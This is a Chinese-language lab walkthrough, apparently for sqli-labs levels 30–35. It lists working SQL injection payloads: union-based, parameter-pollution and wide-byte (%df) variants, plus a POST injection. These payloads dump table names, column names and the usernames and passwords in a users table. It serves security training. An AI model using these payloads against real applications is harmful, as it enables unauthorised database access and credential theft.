第三十关
第三十关和二十九关差不多,将单引号换成双引号
查询表名,字段名,数据
?id=1&id=-2" union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+
?id=1&id=-2" union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name='users'--+
?id=1&id=-2" union select 1,group_concat(password,username),3 from users--+
第三十一关
查询数据库名
查询表名
?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
普通的联合注入( 如果不行,可以尝试一下?id=1&id=-1") )
照正常流程走就好了
第三十二关(宽字节注入)
在1后面加%df让他成为一个字符
?id=-1%df' union select 1,2,database()--+
后面还是联合查询一样的流程
第三十三关
跟三十二一样都是宽字节注入\
?id=-1%df' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+
?id=-1%df' union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273 --+第三十四关
这关还是宽字节注入,可以到是POST提交
我们到bp重放器进行注入
admin%df' union select 1,group_concat(table_name)from information_schema.tables where table_schema=database() #
继续联合注入就行
第三十五关
数字型的宽字节注入但是这关不需要%df
直接联合注入就拿下这关
?id=-1 union select 1,2,database()--+
?id=-1 union select 1,2,group_concat(table_name)from information_schema.tables where table_schema=database() #
?id=-1 union select 1,2,group_concat(column_name)from information_schema.columns where table_schema=database() and table_name=0x7573657273 #
)
